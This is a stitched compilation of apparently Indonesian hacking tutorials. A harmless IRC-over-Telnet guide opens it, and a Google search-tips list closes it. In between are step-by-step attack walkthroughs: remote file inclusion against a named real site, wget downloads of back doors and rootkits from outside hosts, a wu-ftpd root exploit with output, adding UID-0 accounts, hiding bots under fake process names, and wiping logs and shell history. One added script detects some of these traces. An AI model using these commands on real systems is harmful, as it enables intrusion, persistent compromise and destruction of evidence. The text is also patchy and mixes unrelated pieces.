For any questions on this commands please feel free to mail me. My email address is chesschintan@hotmail.com



Chatting via Telnet

Make a direct connection to an IRC server and spend a little time trying out the IRC protocol commands until you can use the protocol directly

Jarkko Oikarinen first introduced IRC to the world in 1988. Five years later he formally defined the IRC protocol in RFC 1459, which made the whole protocol far more accessible. Armed with this information, you can better understand this simple text-based protocol and learn how to connect to an IRC server without using a dedicated client. Once you've mastered this, you should find it easy to write programs that connect to IRC.


TIP

You can find all Internet RFC (Request for Comments) documents at http://www.faqs.org/rfcs. You can search the archive by keyword or document number. RFC 1459 is at http://www.faqs.org/rfcs/rfc1459.html

Fortunately, you don't need to know the whole specification to connect to an IRC server. Connecting to an IRC server only requires sending a few commands. The best way to understand how these commands work is to connect directly to an IRC server with Telnet and type the commands by hand. Telnet lets you make a raw TCP connection to a port on a remote machine and simply start typing commands at whatever service is listening on that port.

Most IRC servers run on port 6667, although you may find some running on different port numbers to help users stuck behind corporate firewalls. In this example, you can try connecting to the freenode IRC network by running Telnet from the command prompt with the following command-line parameters:

% telnet irc.freenode.net 6667

If the connection succeeds, you'll see the server respond with something like this:

NOTICE AUTH :*** Looking up your hostname...

NOTICE AUTH :*** Found your hostname, welcome back

NOTICE AUTH :*** Checking ident

NOTICE AUTH :*** No identd (auth) response

Although the socket is now connected to the IRC server, you still have a few things to do. The IRC server needs to know your login, real name and the nickname you want to use.

The NICK command sets your nickname. It's straightforward: if you want the nickname "si_cebol", just type the following into the Telnet window and press Enter.

NICK si_cebol

If that nickname is already registered by someone else on the server, you're told so; keep sending the same command with a different nickname each time until you find one that's free. This is the kind of message you'll see if the nickname you chose is already taken.


:kornbluth.freenode.net 433 * si_cebol :Nickname is already in use.

The USER command sets your login, user mode and real name. If you want the login "si_cebol", type the following command and press Enter.

USER si_cebol 8 * :Iwan Permana

Kebanyakan server saat ini menggunakan perintah dari IRC RFC 2812 yang diupdate. Perintah User membuat penggunaan beberapa fitur tertentu dalam update dokumen ini. Terutama, angka 8 adalah numeric mode parameter yang digunakan secara otomatis untuk menetapkan mode user saat mendaftar pada server tersebut. Paramater ini merupakan sebuah bit mask, dengan bit 2 yang mewakili user mode w dan bit 3 yang mewakili user mode i, jadi menggunakan nilai 8 artinya bahwa anda menanyakan server tersebut untuk menetapkan mode invisible bagi anda. Sekarang, tinggal 2 bit yang tergolong signifikan. Juga perlu dicatat bahwa teks setelah tanda : adalah dimana anda mengisikan real name.

After the NICK and USER commands have been sent successfully, the server will send you several lines of text. If nothing happens for a few seconds, don't worry: the server may impose an artificial delay of up to a minute if it cannot find an Ident server running on your machine. The first lines sent by the server are rarely of much interest, but you may recognize part of the message of the day, such as "You are now connected to the IRC server!"

TIP

Ident (Identification Protocol) is documented in RFC 1413. See http://www.faqs.org/rfcs/rfc1413.html for the full details.

Now that you are connected, you can do everything an IRC client can do, as far as the protocol allows.

Staying Alive

IRC servers sometimes have trouble keeping track of which clients are still connected. One trick they use is to send a PING command to a client that has shown no activity for a while. The client is expected to respond with a PONG message, which effectively says "Hey, I'm still here!" If the client does not respond within a certain time, the server closes the connection. As a general rule, the PONG reply must include the argument that was sent as part of the server's PING command. So if you receive this message:

PING :kornbluth.freenode.net

you reply with the following PONG command:

PONG :kornbluth.freenode.net

Joining a Channel and Sending Messages

IRC client commands such as /join and /msg will not work here; you have to speak the protocol directly. You can think of the Telnet connection as a primitive IRC client: you can still do everything an IRC client can, it just looks a little clumsy and the commands are different. Even so, joining a channel and sending messages to other users is still easy. To join the channel #irchacks, type:

JOIN #irchacks

If all goes well, you will see the IRC server reply with several lines of text. IRC clients use these lines to work out who is in the channel so they can update their user lists. For now, you don't need to worry about how to process that information.

Sending a message is not entirely intuitive: it is done with the PRIVMSG command. As you would expect from the name, this command can be used to send a private message to another user, but it is also used to send a message to a channel. To send a message to the channel #irchacks, try the following command:

PRIVMSG #irchacks :Hello everybody!

Sending a private message is just as easy: simply put the recipient's nickname where the channel name would go. If you want to send a private message to the user with the nickname "B0iler", just type:

PRIVMSG B0iler :Hi B0iler.

When you are done showing off your newly discovered protocol skills, you can leave the server with the QUIT command. Using this command causes the server to close your connection.

QUIT

The QUIT command takes an optional parameter. It must be preceded by a ':' character; whatever you type after it is shown to other users as the reason you left the server.

QUIT :Telnet is cool!

Whichever method you use to leave the server, before disconnecting it will respond with a line like this:

ERROR :Closing Link: si_cebol (Client Quit)

It is also possible to close the connection simply by closing Telnet, but that does not let you give a reason for leaving the server.

Although every command here was typed in capital letters, you will find that most servers accept them in lowercase as well. Now that you know what to type to connect to an IRC server, next we will learn to write a program that connects to an IRC server for us.

Regards.

Source:
Indonewbies.tk
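The whole exchange described above, run as a program instead of by hand, as an added example (this is not code from the original post, nor from freenode): a small parser for the `[:prefix] command params [:trailing]` line format, a state machine that answers 433 with a new NICK, PING with PONG, 001 with JOIN and 366 with a PRIVMSG and QUIT, and a constructed server transcript modelled on the replies shown above so that it runs offline. The host and port are the ones the post uses; every other name, the sample transcript and the example.invalid hostnames are assumptions.

```python
"""Raw IRC protocol handling, driven by a scripted server transcript.

Added example, not code from the post above or from the freenode network.
SERVER_TRANSCRIPT is constructed for the demo (modelled on the replies the
post shows), so everything runs offline. run_client() does the same exchange
over a real socket; host and port are the post's, all other names are assumed.
"""
import socket
from dataclasses import dataclass, field


def parse_line(raw):
    """Split one raw IRC line into (prefix, command, params).

    RFC 2812 2.3.1: [":" prefix SPACE] command {SPACE middle} [SPACE ":" trailing].
    Only the trailing parameter may contain spaces.
    """
    line = raw.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    params = head.split()
    if sep:
        params.append(trailing)
    if not params:
        return prefix, None, []
    return prefix, params[0].upper(), params[1:]


@dataclass
class ClientState:
    nick: str
    user: str
    realname: str
    channel: str
    registered: bool = False
    joined: bool = False
    closed: bool = False
    inbox: list = field(default_factory=list)   # (sender, target, text)

    def registration(self):
        # NICK, then USER <user> <mode> <unused> :<realname>. Mode 8 sets bit 3,
        # i.e. user mode +i (invisible); only bits 2 and 3 mean anything.
        return [f"NICK {self.nick}", f"USER {self.user} 8 * :{self.realname}"]


def handle_server_line(state, raw):
    """Return the lines to send back in response to one line from the server."""
    prefix, command, params = parse_line(raw)
    reply = []
    if command == "PING":
        reply.append(f"PONG :{params[-1]}")      # echo the argument or get dropped
    elif command == "433":
        state.nick += "_"                         # ERR_NICKNAMEINUSE: retry NICK
        reply.append(f"NICK {state.nick}")
    elif command == "001":
        state.registered = True                   # RPL_WELCOME: registration done
        state.nick = params[0]                    # the nick the server accepted
        reply.append(f"JOIN {state.channel}")
    elif command == "366":
        state.joined = True                       # RPL_ENDOFNAMES: join finished
        reply.append(f"PRIVMSG {state.channel} :Hello everybody!")
        reply.append("QUIT :Telnet is cool!")
    elif command == "PRIVMSG" and prefix:
        # prefix is nick!user@host when the message comes from another user
        state.inbox.append((prefix.split("!", 1)[0], params[0], params[-1]))
    elif command == "ERROR":
        state.closed = True                       # "Closing Link": we are done
    return reply


# Constructed server side of the session; a real server's replies vary.
SERVER_TRANSCRIPT = [
    "NOTICE AUTH :*** Looking up your hostname...",
    "NOTICE AUTH :*** No identd (auth) response",
    ":kornbluth.freenode.net 433 * si_cebol :Nickname is already in use.",
    ":kornbluth.freenode.net 001 si_cebol_ :Welcome to the network si_cebol_",
    "PING :kornbluth.freenode.net",
    ":kornbluth.freenode.net 353 si_cebol_ = #irchacks :si_cebol_ B0iler",
    ":kornbluth.freenode.net 366 si_cebol_ #irchacks :End of /NAMES list.",
    ":B0iler!~b0iler@example.invalid PRIVMSG si_cebol_ :Hi si_cebol_",
    "ERROR :Closing Link: si_cebol_ (Client Quit)",
]


def run_transcript(state, server_lines=SERVER_TRANSCRIPT):
    """Drive the state machine with scripted server lines; return what we sent."""
    sent = state.registration()
    for raw in server_lines:
        sent.extend(handle_server_line(state, raw))
        if state.closed:
            break
    return sent


def run_client(state, host="irc.freenode.net", port=6667):
    """The same exchange over a real TCP connection (not exercised offline)."""
    with socket.create_connection((host, port), timeout=90) as sock:
        def send(line):
            sock.sendall(f"{line}\r\n".encode())
        for line in state.registration():
            send(line)
        for raw in sock.makefile("rb"):
            for line in handle_server_line(state, raw.decode(errors="replace")):
                send(line)
            if state.closed:
                break


if __name__ == "__main__":
    st = ClientState("si_cebol", "si_cebol", "Iwan Permana", "#irchacks")
    for line in run_transcript(st):
        print(">>", line)
```

Running the file prints the seven lines the client would send; point run_client() at a server to do the same over TCP. One detail worth keeping: the nick to remember is the one in the first parameter of the 001 reply, because after a 433 it can differ from the one you first asked for.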


Tembak IP (Shooting an IP off the network)

The author (th3sn0wbr4in) assumes that readers of this write-up can already inject
a target and understand a little about IP addressing. If you are not yet used to injecting you will
be shy and nervous (xixixixixi), and if you know nothing at all about IP addressing then the
target you shoot at is not going to disconnect or go down.
So, if you can already inject and understand a bit about IP addressing, let's go straight to it...

0o0 First you need a server that is ready to be injected [if you don't have one, just look on Google].
th3sn0wbr4in has a few targets and bugs here that "hopefully" can still be used.

0o0 For this example I use the PHPLiveHelper bug, and the keyword I tried on Google to find targets was
allinurl:"/PHPLiveHelper/*.php"

0o0 I tried one of the Google results, namely http://www.maldivesrds.com/phplivehelper/mail.php?
ipadd=219.83.4.68&PHPSESSID=accdc7e62171c549536495c2b40a5dd3&department=1&livename=

0o0 Remove the part /mail.php?ipadd=219.83.4.68&PHPSESSID=accdc7e62171c549536495c2b40a5dd3&department=1&
livename= and append the bug to the target's URL, so that the target address becomes
http://www.maldivesrds.com/phplivehelper/initiate.php?abs_path=http://freewebs.com/th3sn0wbr4in/tusuk.htm?

0o0 So... it can be injected, right? We can see the UID is nobody(99); that's fine...

0o0 Find a directory that the user nobody can write to. As usual, type the Linux command. You can type
find / -type d -perm 777 or find / -type d -user nobody and plenty of results will come out...
/* Command 1 above searches from the top directory '/' for entries of type directory with permission
777 (rwx) for everyone, including the user nobody (note that -perm 777 only matches directories whose mode is exactly 777) */
/* Command 2 above searches from the top directory '/' for directories owned by the user nobody,
because the owner of a directory can do anything in it */
Look for one without "Permission Denied" after it, copy it, paste it into the Directory field of your PHPShell
and press [Enter]. If they all say Permission Denied, just try the directory /tmp, which is usually mode 777.

0o0 Download the file for the attack using wget. Type wget http://freewebs.com/th3sn0wbr4in/tembak.c.
If wget cannot be used (Command not found or denied), use lwp-download.
Type lwp-download http://freewebs.com/th3sn0wbr4in/tembak.c and just press [Enter].
If you use wget, output roughly like this appears in your PHPShell:

--02:39:51-- http://freewebs.com/th3sn0wbr4in/tembak.c
=> `tembak.c'
Resolving freewebs.com... 38.119.100.2
Connecting to freewebs.com[38.119.100.2]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,744 [text/x-csrc]

0K ... 100% 30.89 KB/s

02:39:51 (30.89 KB/s) - `Sambit.c' saved [3764/3764]

Once the word saved appears, the file has been downloaded...
0o0 Compile tembak.c so that it becomes an executable (on Windows the extension is .exe; on Linux
there is no extension).
Type gcc tembak.c -o tembak
The command above runs gcc, compiling the file tembak.c (C source code) with the output
file named tembak. You can change the name tembak to whatever you like.

0o0 Now run the tembak file. What do you type?

0o0 ./tembak 219.83.4.68 80
0x01 ./ is the directory where we put the tembak file
0x02 219.83.4.68 is the IP of the internet cafe where I was playing
0x03 80 is the port number; 80 is HTTP, a.k.a. browsing
What is a port for? Stop asking questions, open Google! Search for what you want to know!
0o0 Closing
Are we going to stay children forever...? Giving no credit to the author...?
Or do you still cling to your childish ways, changing the author's real identity and then
putting your own name down as the author here...?
Why do I keep bringing this up...? Because in the eyes of the foreign IT community, Indonesia is
often branded as a nation of plagiarists who freely write the word `author` when in reality
they have only lightly edited a paper that someone else wrote, and sometimes they themselves don't
even understand what the paper is about.


Pasang Back Door (Installing a back door)

-*-------------------*-
-*- pasang backd00R -*-
-*-------------------*-


=====================
install a php shell
=====================
###for example
http://livron.port5.com/mail.php <---------this is the shell source
for instance:
http://www.moonshade.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=wget%20http://livron.port5.com/mail.php -O log.php
if the message "permission denied" appears, look for another folder where our shell.php can be fetched with wget
if it works... open:
http://www.target.org/modules/My_eGallery/public/log.php

==============
install bindtty
==============
###http://student.te.ugm.ac.id/~phoenix03/audit/bindedit.c
gcc -o /var/tmp/bind /var/tmp/bind.c;/var/tmp/bind 4000
above we use port 4000 as the binding port; now check whether port
4000 is open by scanning with phnxscan.c, written by the author; you can download the
source code at http://student.te.ugm.ac.id/~phoenix03/tutorial/phnxscan.c. Compile
it with gcc, run it, and scan port 4000 on the server www.target.com.
myshell~>gcc -o phnxscan phnxscan.c
myshell~> ping -c 2 target.com
PING target.com (210.189.77.28): 56 data bytes
64 bytes from 210.189.77.28: icmp_seq=0 ttl=38 time=428.044 ms
64 bytes from 210.189.77.28: icmp_seq=1 ttl=38 time=428.624 ms
--- target.com ping statistics ---
2 packets transmitted, 2 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 428.044/428.334/428.624/0.290 ms
myshell~> phnxscan -p 4000 -s 210.189.77.28
port 4000 (tcp) open
Telnet to the target server on port 4000; if it works you will be asked for
a password, which by default in the script is changeme
myshell~> telnet 210.189.77.28 4000
Trying 210.189.77.28...
Connected to target.com (210.189.77.28).
Escape character is '^]'.
---------------------------------------------------
#### cd /var/tmp ; wget www.geocities.com/lifron/bindtty -O /tmp/httpd    this puts the downloaded file in the folder /tmp under the name httpd
then make the file executable
chmod 755 /tmp/httpd
----------------------------------------------------
#### cd /var/tmp ; wget www.renjana.ws/~toa/bindtty
cd /var/tmp ; chmod 755 bindtty
cd /var/tmp ; ./bindtty
----------------------------------------------------

# check with `uname -a` < only kernel 2.4.20 and below work
wget http://roseofworld.org/shell.tar
tar -zxvf shell.tar; cd webshell; ./1980
# once that is done open putty > enter the host > choose telnet > port: 1980
# if it succeeds you get a shell

### use a different bind if you want the shell to have a password
cd /var/tmp; wget geocities.com/pothei/nmap;chmod 755 nmap; ./nmap
# telnet to the host on port 6665, password `stimik`

## cd /tmp; wget http://geocities.com/g4ptek/tools/bind.tgz
tar -zxvf bind.tgz;cd .bind; chmod 755 bindtty; ./dssl bindtty
telnet to the host on port 6665, password `gagal`

## cd /var/tmp; wget http://geocities.com/g4ptek/tools/dns.php
# chmod 755 dns; ./dns
# telnet www.target.com 6029

-*-------------------*-
-*- belajar NgeRoot (learning to get root) -*-
-*-------------------*-

### the rooting stage, in the shell we just broke into
mkdir /tmp/temp.log
cd /tmp/temp.log
wget http://roseofworld.org/root.tar.gz
tar -zxvf root.tar.gz
cd root
./loginx 1970 1970
# if you get no error message you succeeded: the $ prompt changes to #
# check with `id`; if you are root don't forget to share the shell :p
### or you can grab an exploit from www.malanghack.net/alat/
mkdir /tmp/temp.log;cd /tmp/temp.log
wget http://www.malanghack.net/alat/w00t
chmod 755 w00t
./w00t
# if no error message appears: you got root man!!
+----------------------------------------------------------------------------------------+

-*-----------------*-
-*- Cracking Root -*-
-*-----------------*-
Tips:
mkdir .bash <--- creates the directory .bash
cd .bash <--- enters the directory .bash
mkdir <--- creates a new directory
cd <--- enters the directory you want
cd / <--- leaves the current directory (goes to the root of the filesystem)
rm -rf <--- deletes a file/directory
-*-----------------------------------------------*-
1. Stage One:
How to install Xpost and ftp

wget http://cyberborneo.b0x.com/xpost.tgz
wget http://cyberborneo.b0x.com/ftp.tgz
tar -zxvf xpost.tgz
tar -zxvf ftp.tgz

-*------*-



2. Stage Two
cd xpost
cd xwurm/
./scan 213.124
once you have wu-scan.log
./masswu wu-scan.log
When you get the following message

Trying get root 213.124.151.113 ...
SUCCESS, YOU HAVE ROOT IN 213.124.151.113 ...
Logged in log-root ...

it means you have root access on the IP 213.124.151.113

-*------*-

3. Stage Three
Open a new session in your PuTTY ssh and log back in to your shell

enter your ftp directory

cd ftp
./awu 213.124.151.113 ( the IP )

if you succeed in getting root access, the following message appears:

7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).

# trying to log into 213.124.151.113 with (ftp/mozilla@) ... connected.
# banner: 220 db-depot01 FTP server (Version wu-2.6.1-16) ready.
# successfully selected target from banner

### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]

# 1. filling memory gaps
# 2. sending bigbuf + fakechunk
building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes
# 3. triggering free(globlist[1])
#
# exploitation succeeded. sending real shellcode
# sending setreuid/chroot/execve shellcode
# spawning shell
###################################################################

uid=0(root) gid=0(root) groups=50(ftp)
Linux db-depot01 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown

whoami

root <-- means you are now running as root

-*------*-

4. Stage Four

Add a login with root access
----------------------------------------------------------------

1. Method I

(not for redhat 7.2)
/usr/sbin/useradd rampok -u 0 -d /

passwd -d rampok
passwd rampok

su rampok <<-------- to become superuser

2. Method II

if you want root access type:

/usr/sbin/useradd crit -u 0 -g 0 -d /etc/crit
then type
passwd crit

wuasu666 <-- the password, entered at the prompt

Then add a user for your shell login

/usr/sbin/adduser html -g wheel -s /bin/bash -d /etc/html
passwd html
fuck666 (typed twice)

-*------*-

5. Stage Five

Install a backdoor on your new shell to guard against anything unwanted

wget www.utay-doyan.cc/shv4.tar.gz
tar -zxvf shv4.tar.gz
cd shv4
./setup <password you want> <port you want>

example: --> ./setup wuasu 7000
cd /

wget http://cyberborneo.b0x.com/cleaner.tgz
tar -zxvf cleaner.tgz
cd cleaner
./install

Don't forget to delete your backdoor archives to cover your tracks

rm -rf cleaner.tgz

rm -rf shv4.tar.gz

-*------*-

6. Stage Six

Erase the traces of your rooting by typing the following commands:

rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog
ctrl d (press Ctrl-D to end the now-empty file)

DONE.....


---------------------------------------------------------------------------------
-*-----------------*-
-*- all IN one -*-
-*-----------------*-
Tricks for setting up PsyBNC, deleting log files, installing a BACK DOOR, .....


---------------------------------------------------------------------------------
-*------------------------------------------*-
-*- Steps to set up a "safe" PsyBNC :P~ --*-
-*------------------------------------------*-

mkdir "...." <<-- this is our directory; next we enter it
cd "...." <<-- enter the directory
wget http://www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh
tar -zxvf .sh
mv psybnc .log
cd .log
make
echo "PSYBNC.SYSTEM.PORT1=110" >> user.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> user.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> user.conf
pwd
/home/scut/..../.log
type the command:
PATH=$PATH:/home/scut/"...."/.log
mv psybnc "[identd] "
mv scut.conf " "
"[identd] " " " <<-- run the renamed binary with the renamed config file

.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.2.1 (c) 1999-2000 the most psychoid and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File:
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 11111
psyBNC2.2.1-cBtITLdDMSNp started (PID 2291)
[scut@d11303 .log]$


ps -x shows the background processes in the shell
[scut@d11303 .log]$ ps -x
PID TTY STAT TIME COMMAND
31544 ? S 0:16 ./bash
31629 ? S 0:06 sendmail to scut
2212 pts/1 S 0:00 -bash
2291 pts/1 S 0:00 [identd]
2309 pts/1 R 0:00 ps -x
note: 2291 pts/1 S 0:00 [identd] <<-- this is your psybnc running in the
background, renamed by the trick above. Don't celebrate too soon, though, because the admin may get suspicious about the background processes on the server and go looking with:

find | grep psybnc <<-- a likely move, because admins usually know that users always run psybnc, and this shows the names of your psybnc files
./log/psybnc.log
./log/psybnc.log.old
./psybncchk
./psybnc.pid

So we need to rename those files to something else, for example
[scut@d11303 .log]$ mv psybnc.pid .log
[scut@d11303 log]$ mv psybnc.log .sh
[scut@d11303 log]$ mv psybnc.log.old .mud

That way the admin will hopefully not get suspicious about the background process on your server ;) and finally don't forget to clean your logs by typing:
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
Or you can use remove.c from the k-elektronik site :) have fun
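Each of the steps above leaves a trace a host check can pick up: the "Cracking Root" section adds logins with -u 0 and links .bash_history to /dev/null, the back door section parks bindtty as /tmp/httpd, and the PsyBNC section renames the binary to "[identd] " so it blends into ps output. The following is an added example of such checks, written for this page and not code from the write-up or from any tool it names. The passwd excerpt and the process table are constructed to mirror the page's own output so the checks run offline; live_process_table() reads the real /proc on Linux, and needs root to see other users' processes.

```python
"""Host checks for the persistence and anti-forensics tricks described above.

Added example, not code from the write-up or from the tools it names. Each
check takes its input explicitly, so the constructed samples below run
offline; live_process_table() reads the real /proc on Linux.
"""
import os
from pathlib import Path

# Constructed /etc/passwd excerpt: root plus the two UID-0 logins that
# "Method I" and "Method II" above create.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
rampok:x:0:0::/:/bin/bash
crit:x:0:0::/etc/crit:/bin/bash
html:x:1001:10::/etc/html:/bin/bash
"""

# Constructed process table as (pid, comm, exe). ps prints a genuine kernel
# thread as [name] because it has no cmdline; its comm has no brackets and
# /proc/<pid>/exe has no target (None). A binary renamed to "[identd] " has both.
SAMPLE_PROCS = [
    (2, "kthreadd", None),
    (2212, "bash", "/bin/bash"),
    (2291, "[identd] ", "/home/scut/..../.log/[identd] "),   # renamed psybnc
    (31544, "httpd", "/tmp/httpd"),                         # bindtty copy
    (31629, "httpd", "/usr/sbin/httpd"),                    # the real web server
]

SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def extra_uid0_accounts(passwd_text):
    """Usernames other than root whose UID field is 0."""
    hits = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) >= 3 and f[2] == "0" and f[0] != "root":
            hits.append(f[0])
    return hits


def fake_kernel_threads(procs):
    """Processes whose comm contains a bracket or is padded with whitespace;
    a real kernel thread's comm has neither, so these are renamed binaries."""
    return [(pid, comm, exe) for pid, comm, exe in procs
            if "[" in comm or comm != comm.strip()]


def executables_in_scratch(procs):
    """Processes whose binary lives in a world-writable scratch directory."""
    return [(pid, comm, exe) for pid, comm, exe in procs
            if exe and exe.startswith(SCRATCH_DIRS)]


def history_redirected(home):
    """True when <home>/.bash_history is a symlink (the /dev/null trick)."""
    return (Path(home) / ".bash_history").is_symlink()


def live_process_table():
    """(pid, comm, exe) for every process in /proc; exe is None for kernel
    threads and '?' when /proc/<pid>/exe is not readable by this user."""
    procs = []
    for d in Path("/proc").iterdir():
        if not d.name.isdigit():
            continue
        try:
            comm = (d / "comm").read_text().rstrip("\n")
        except OSError:
            continue                        # process exited mid-scan
        try:
            exe = os.readlink(d / "exe")
        except FileNotFoundError:
            exe = None
        except PermissionError:
            exe = "?"
        procs.append((int(d.name), comm, exe))
    return procs


if __name__ == "__main__":
    print("extra uid 0:", extra_uid0_accounts(Path("/etc/passwd").read_text()))
    procs = live_process_table()
    print("renamed to look like kernel threads:", fake_kernel_threads(procs))
    print("running from scratch dirs:", executables_in_scratch(procs))
    for home in [Path("/root"), *Path("/home").glob("*")]:
        if history_redirected(home):
            print("history linked away:", home)
```

The comm check works because the bracketed name in ps comes from ps itself when a process has no cmdline, not from the process name; a binary actually called "[identd] " carries the bracket and the trailing space in /proc/<pid>/comm. The /var/log/lastlog truncation in Stage Six is not covered here; a zero-length lastlog on a multi-user host is worth the same attention.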

-*------------------------------------------*-
-*- Steps to set up PsyBnc II --*-
-*------------------------------------------*-
wget http://www.geocities.com/g4ptek/tools/psy.tar.gz
tar -zxvf psy.tar.gz
rm -rf psy.tar.gz
cd .cgi;
./config 21221;-----------> change the port as you wish
./fuck;./run
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.2.1 (c) 1999-2000 the most psychoid and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File:ssstt
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 21221
psyBNC2.2.1-cBtITLdDMSNp started (PID 2291)
# usage:
# open mIRC, set any identd and any nick you like
type /server www.target.com 21221

-*------------------------------------------*-
-*- Steps to set up PsyBnc II on FreeBSD --*-
-*------------------------------------------*-
# wget http://www.geocities.com/g4ptek/tools/bnc.tar.gz
# tar -zxvf bnc.tar.gz
# rm -rf bnc.tar.gz
# cd .ls
# chmod 755 ls
# ./ls
-*-----------------------------------*-
-*- An easy way to make a BOT I -*-
-*-----------------------------------*-

NB: this BOT runs automatically on the DALnet servers ("for DALnet servers only")
1. wget brendanspaar.com/modules/coppermine/albums/kinabot.tar.gz
or brendanspaar.com/modules/coppermine/albums/kinabot.tar.bz2 <-- this one also includes creat.tcl
2. tar -zvxf kinabot.tar.gz for kinabot.tar.gz
tar -jxvf kinabot.tar.bz2 for kinabot.tar.bz2
3. cd .kin
4. ./creat fileconf nick ident IP channel owner

example: ./creat defaced s4nd4l_j3p1t s4nd4l 212.88.174.3 defaced g4ptek
defaced.................... the conf file to be created (it is created automatically)
s4nd4l_j3p1t ...............bot nick
s4nd4l ...................bot ident
212.88.174.3 .......IP of the shell
defaced ..................... channel name, without the #
g4ptek ................ owner's nick

note: if the nick contains an unusual character, e.g. `, put a \ (backslash) before that character
example: mich`keren -> mich\`keren

5. ./eggdrop -m fileconf
or ./run fileconf fakename
a fakename can be found with the command ps x; just pick the process name that appears most often

example ./run a.txt /usr/local/apache/bin/httpd ( /usr/local/apache/bin/httpd = the fake name)
That's it! Just wait in the channel, or whois the nick.
If you want to add other tcl scripts such as creat.tcl:

2. ./tcl -t fileconf creat.tcl
example: ./tcl -t a creat.tcl ( see the help by running ./tcl )
for usage, see the command !creat in the channel

-*-----------------------------------*-
-*- An easy way to make a BOT II -*-
-*-----------------------------------*-

wget http://geocities.com/g4ptek/tools/bot.tar.gz
tar -zxvf bot.tar.gz
rm -rf bot.tar.gz
cd .share
# download bot.txt to your PC, edit the settings as needed, then upload it again
# example: http://verzekering.it/voorwaarden/.conf/scripts/bot4.txt
# to add tcl scripts go into the folder .share/scripts/, download every tcl you need from http://verzekering.it/voorwaarden/.conf/scripts/ and add them to the folder .share/scripts/
# if you want a tcl to run don't forget to add it to the file /.share/bot.txt (at the very bottom) and upload it again
./shade "httpd" ./eggdrop -m bot.txt
# usage:
# send your bot a private message in the channel
# /msg your-bot-nick auth
# /msg your-bot-nick pass
# /msg your-bot-nick auth

Happy bot building....

rewritten on barata jaya SBY, February 6th 2006 by g4ptek

Thursday, 26 March 2009

Utilizing search engines

So much information is on the web, it's mind boggling. Thankfully we have search
engines to sift through it and categorize it for us. Unfortunately, there is still so
much info that even with these search engines, it's often a painstakingly slow process
(something comparable to death for a hacker) to find exactly what you're looking for.

Let's get right into it.

I use google.com as my primary search engine because it presently tops the charts as far as
the number of sites it indexes, which means more pertinent info per search.

1. Page translation.
Just because someone speaks another language doesn't mean they don't have anything useful to say. I use translation tools like the ones found at

http://babelfish.altavista.com
and

http://world.altavista.com
to translate a few key words I am searching for. Be specific and creative, because these tools aren't the most accurate things on the planet.

2. Directories.
These days everything is about $$$. We have to deal with SEO (search engine optimization), which seems like a good idea on paper until you do a search for toys and get 5 porn sites in the first 10 results. Using a site's directory will eliminate that. You can narrow your search down easily by looking for the info in specific categories. (PS google DOES have directories; they're at: directory.google.com)

3. Here are some tips that google refers to as "advanced"

A. "xxxx" / will look for the exact phrase. (google isn't case sensitive)
B. -x / will search for something excluding a certain term
C. filetype:xxx / searches for a particular file extension (exe, mp3, etc)
D. -filetype:xxx / excludes a particular file extension
E. allinurl:x / terms in the url
F. allintext:x / terms in the text of the page
G. allintitle:x / terms in the html title of that page
H. allinanchor:x / terms in the links

4. OR
Self explanatory, one or the other... (ie: binder OR joiner)

5. ~X
Synonyms/similar terms (in case you can't think of any yourself)

6. Numbers in a range.
Let's say you're looking for an mp3 player but only want to spend up to $90. Why swim through all the others? MP3 player $0..$90 The two periods set a numeric range to search between. This also works with dates, weights, etc.

7. +
Ever type in a search and see something like this:
"The following words are very common and were not included in your search:"
Well, what if those common words are important in your search? You can force google to search even the common terms by putting a + in front of the dropped word.

8. Preferences
It amazes me when I use other people's PCs that they don't have their google search preferences saved. When you use google as much as I do, who can afford not to have preferences? They're located to the right of the search box, and have several options, though I only find 2 applicable for myself...
A. Open results in a new browser window
B. Display 10-100 results per page. (I currently use 50 per page, but that's a resolution preference, and 5X the default)

9. *
Wildcard searches. Great when applied to a previously mentioned method. If you only know the name of a prog, or are looking for ALL of a particular file (ie. you're DLing tunes), something like *.mp3 would list every mp3.

10. Ever see this?
"In order to show you the most relevant results, we have omitted some entries very similar to the X already displayed. If you like, you can repeat the search with the omitted results included." The answer is YES. yes yes yes. Did I mention yes? I meant to.

11. Search EVERYWHERE
